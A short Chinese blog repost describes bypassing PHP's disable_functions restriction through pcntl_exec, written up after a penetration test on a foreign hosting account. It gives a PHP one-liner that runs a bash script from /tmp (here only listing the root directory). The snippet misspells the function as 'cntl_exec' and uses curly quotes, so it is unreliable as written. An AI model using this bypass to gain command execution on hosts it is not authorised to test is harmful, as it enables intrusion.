利用pcntl_exec突破disable_functions

1、说明
pcntl是linux下的一个扩展,可以支持php的多线程操作。
pcntl_exec函数的作用是在当前进程空间执行指定程序,版本要求:PHP 4 >= 4.2.0, PHP 5
2、利用
在做渗透的时候被disable_functions卡住不能执行命令是家常便饭,今天在一国外虚拟主机上又被卡了,但我在执行phpinfo();的时候眼前闪过–enable-pcntl。当时我就偷笑了,没啥好说的,我一直强调渗透要细心做人做事也一样。

#exec.php
<?php cntl_exec(“/bin/bash”, array(“/tmp/b4dboy.sh”));?>
#/tmp/b4dboy.sh
#!/bin/bash
ls -l /

原文:http://www.secoff.net/archives/116.html

本文固定链接: https://www.unhonker.com/technical/1061.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2013年04月18日发表在 技术文章 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: 利用pcntl_exec突破disable_functions | 90' s Blog|关注网络信息安全

利用pcntl_exec突破disable_functions:目前有1 条留言

  1. 沙发
    z0rro:

    大哥,这个测试过了没 我的本地测试怎么不行 🙄

    2013-05-01 09:46

发表评论

您必须 [ 登录 ] 才能发表留言!